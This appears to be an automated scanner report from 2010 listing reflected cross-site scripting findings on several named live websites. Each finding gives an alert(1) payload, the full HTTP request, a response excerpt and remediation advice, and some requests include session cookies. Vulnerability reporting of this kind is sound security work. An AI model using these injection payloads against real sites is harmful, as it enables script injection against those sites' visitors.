HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 74462 Date: Sun, 19 Dec 2010 03:43:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h ...[SNIP]... //yellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/coupons?c029f"-alert(1)-"2312b370fab=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c1690<script>alert(1)</script>81a15180fdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /waf.srv/sjc1690<script>alert(1)</script>81a15180fdb/sj/cn HTTP/1.1 Host: www.swarmjam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e5f8a<img%20src%3da%20onerror%3dalert(1)>b40aa474e63 was submitted in the REST URL parameter 3. This input was echoed as e5f8a<img src=a onerror=alert(1)>b40aa474e63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /waf.srv/sj/sje5f8a<img%20src%3da%20onerror%3dalert(1)>b40aa474e63/cn HTTP/1.1 Host: www.swarmjam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 59880<img%20src%3da%20onerror%3dalert(1)>f1606bba0a9 was submitted in the REST URL parameter 4. This input was echoed as 59880<img src=a onerror=alert(1)>f1606bba0a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /waf.srv/sj/sj/cn59880<img%20src%3da%20onerror%3dalert(1)>f1606bba0a9 HTTP/1.1 Host: www.swarmjam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Set-Cookie: BIGipServercx_auction_2_0=704651274.20480.0000; path=/ Date: Sun, 19 Dec 2010 02:58:56 GMT Server: Apache/2.0.63 (Unix) mod_jk/1.2.15 Content-Language: en-US Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 3828
<html><head><title>Apache Tomcat/4.1.18 - Error report</title><STYLE><!--H1{font-family : sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;} H3{font-family : sans-serif,Arial,Tahoma;co ...[SNIP]... <pre>javax.servlet.ServletException: Error: Site not found 'cn59880<img src=a onerror=alert(1)>f1606bba0a9' at com.cityxpress.taglib.common.dispatcher.WAFDispatcher.SetAttributes(WAFDispatcher.java:100) at com.cityxpress.taglib.common.dispatcher.WAFDispatcher.doGet(WAFDispatcher.java:115) at javax.servl ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 330d2'%3b5586b9f7d43 was submitted in the REST URL parameter 1. This input was echoed as 330d2';5586b9f7d43 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Business330d2'%3b5586b9f7d43/article/572653 HTTP/1.1 Host: www.thestar.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:00:06 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-1 cache-control: public, max-age=600 X-TOPS-CacheReason: Article Content-Length: 76019 Date: Sun, 19 Dec 2010 02:59:21 GMT X-Varnish: 709048350 Age: 0 Via: 1.1 varnish Connection: close X-Cache-Svr: topsvarnish5-2 X-Cache: MISS Set-Cookie: BIGipServerTOPS-WebFarm5=587273132.20480.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_business330d2';5586b9f7d43_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick="> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd8c4'%3b132ab7b4bf5 was submitted in the REST URL parameter 2. This input was echoed as dd8c4';132ab7b4bf5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Business/dd8c4'%3b132ab7b4bf5/572653 HTTP/1.1 Host: www.thestar.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-2 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Content-Length: 52461 Date: Sun, 19 Dec 2010 02:59:13 GMT X-Varnish: 1642433058 Age: 0 Via: 1.1 varnish Connection: close X-Cache-Svr: topsvarnish5-1 X-Cache: MISS Set-Cookie: BIGipServerTOPS-WebFarm5=553718700.20480.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987120/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_business_dd8c4';132ab7b4bf5_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick="> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5cb6"><script>alert(1)</script>55912517a0c was submitted in the REST URL parameter 1. This input was echoed as d5cb6\"><script>alert(1)</script>55912517a0c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ticketstonightd5cb6"><script>alert(1)</script>55912517a0c/event.details.php?id=3001 HTTP/1.1 Host: www.ticketstonight.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 03:38:45 GMT Server: Apache Set-Cookie: sess_5bed166d3c=1af695cefe91f5f39f078f271cfea2cd; path=/ Expires: Sat, 18 Dec 2010 22:08:46 -0600 Cache-Control: max-age=0, s-maxage=1800, must-revalidate Pragma: X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13641
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a href="javascript:MyHawaiiPrintPage('/ticketstonightd5cb6\"><script>alert(1)</script>55912517a0c/event.details.php?id=3001&print_format=1');"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1d65'%3b36b54885240 was submitted in the REST URL parameter 1. This input was echoed as c1d65';36b54885240 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /businessc1d65'%3b36b54885240/ HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:00:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:00:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 60792
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52305'%3b3c5d8e31179 was submitted in the REST URL parameter 1. This input was echoed as 52305';3c5d8e31179 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business52305'%3b3c5d8e31179/Private+secure+network+keeps+people+touch/ HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:00:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:00:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 61448
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afd58'%3b30b3668cac6 was submitted in the REST URL parameter 2. This input was echoed as afd58';30b3668cac6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business/Private+secure+network+keeps+people+touchafd58'%3b30b3668cac6/ HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:00:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:00:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 61421
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eef75'%3b47a26ddbae5 was submitted in the REST URL parameter 1. This input was echoed as eef75';47a26ddbae5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /businesseef75'%3b47a26ddbae5/Private+secure+network+keeps+people+touch/3448945/ HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:01:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:01:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 61643
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aee4'%3ba81f74d1fd9 was submitted in the REST URL parameter 2. This input was echoed as 4aee4';a81f74d1fd9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business/Private+secure+network+keeps+people+touch4aee4'%3ba81f74d1fd9/3448945/ HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:01:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:01:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 63813
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79dac'%3b02823d021e2 was submitted in the REST URL parameter 3. This input was echoed as 79dac';02823d021e2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business/Private+secure+network+keeps+people+touch/344894579dac'%3b02823d021e2/ HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:02:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:02:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 61557
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8d40'%3bb4f80011771 was submitted in the REST URL parameter 3. This input was echoed as d8d40';b4f80011771 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business/Private+secure+network+keeps+people+touch/3448945d8d40'%3bb4f80011771/story.html HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 95586 Expires: Sun, 19 Dec 2010 03:00:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:00:57 GMT Connection: close Set-Cookie: ASP.NET_SessionId=rs402tintjabs545lihkac45; path=/; HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:pas="http://pluck.vancouve ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/ccn.com/business/private-secure-network-keeps-people-touch/3448945d8d40';b4f80011771/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=business;kw=private-secure-network-keeps-people-touch;kw=3448945d8d40';b4f80011771;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=256 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f63d0'%3b344e98374ba was submitted in the REST URL parameter 4. This input was echoed as f63d0';344e98374ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business/Private+secure+network+keeps+people+touch/3448945/f63d0'%3b344e98374ba HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:01:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:01:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 61647
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16727'%3beba4bff93ee was submitted in the REST URL parameter 1. This input was echoed as 16727';eba4bff93ee in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /16727'%3beba4bff93ee HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:00:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:00:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 60693
1.354. http://www.viglink.com/account [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.viglink.com
Path:
/account
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd5b"><script>alert(1)</script>9c7ef78ecd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /account?5dd5b"><script>alert(1)</script>9c7ef78ecd5=1 HTTP/1.1 Host: www.viglink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=A053635AA2C3C40DC2C7D3FEC635779B; __utmz=54157999.1292602654.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; vglnk.Agent.p=0a84063c2069b684e1cf5483b66c3522; __utma=54157999.1186515448.1292596715.1292602654.1292728545.3; __utmc=54157999; __utmb=54157999.6.10.1292728545;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Sun, 19 Dec 2010 03:45:29 GMT Expires: -1 Pragma: no-cache Set-Cookie: JSESSIONID=9BD97DCA9D7762F2670DB1E1F03345C6; Path=/ Vary: Accept-Encoding Content-Length: 4676 Connection: Close
1.355. http://www.viglink.com/dashboard [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.viglink.com
Path:
/dashboard
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bec13"><script>alert(1)</script>17bc629c6f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /dashboard?bec13"><script>alert(1)</script>17bc629c6f0=1 HTTP/1.1 Host: www.viglink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=A053635AA2C3C40DC2C7D3FEC635779B; __utmz=54157999.1292602654.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; vglnk.Agent.p=0a84063c2069b684e1cf5483b66c3522; __utma=54157999.1186515448.1292596715.1292602654.1292728545.3; __utmc=54157999; __utmb=54157999.6.10.1292728545;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Sun, 19 Dec 2010 03:45:31 GMT Expires: -1 Pragma: no-cache Set-Cookie: JSESSIONID=B4EA305C436F5A237D15DF9B43B22F82; Path=/ Vary: Accept-Encoding Content-Length: 4684 Connection: Close
1.356. http://www.viglink.com/dashboard/weekly [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.viglink.com
Path:
/dashboard/weekly
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d590b"><script>alert(1)</script>d38a4550a60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /dashboard/weekly?d590b"><script>alert(1)</script>d38a4550a60=1 HTTP/1.1 Host: www.viglink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=A053635AA2C3C40DC2C7D3FEC635779B; __utmz=54157999.1292602654.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; vglnk.Agent.p=0a84063c2069b684e1cf5483b66c3522; __utma=54157999.1186515448.1292596715.1292602654.1292728545.3; __utmc=54157999; __utmb=54157999.6.10.1292728545;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Sun, 19 Dec 2010 03:45:31 GMT Expires: -1 Pragma: no-cache Set-Cookie: JSESSIONID=FF71C9F4839729CCC7BAD26DCC9B1EAB; Path=/ Vary: Accept-Encoding Content-Length: 4691 Connection: Close
1.357. http://www.viglink.com/tools/coverage [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.viglink.com
Path:
/tools/coverage
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17d37"><script>alert(1)</script>ddb311f67d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /tools/coverage?17d37"><script>alert(1)</script>ddb311f67d4=1 HTTP/1.1 Host: www.viglink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=A053635AA2C3C40DC2C7D3FEC635779B; __utmz=54157999.1292602654.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; vglnk.Agent.p=0a84063c2069b684e1cf5483b66c3522; __utma=54157999.1186515448.1292596715.1292602654.1292728545.3; __utmc=54157999; __utmb=54157999.6.10.1292728545;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Sun, 19 Dec 2010 03:45:23 GMT Expires: -1 Pragma: no-cache Set-Cookie: JSESSIONID=ABA23A8D2158C498C8DD5226C35B92C9; Path=/ Vary: Accept-Encoding Content-Length: 4690 Connection: Close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc632"-alert(1)-"71a12eb36b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofilecc632"-alert(1)-"71a12eb36b9/css/busprofile.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
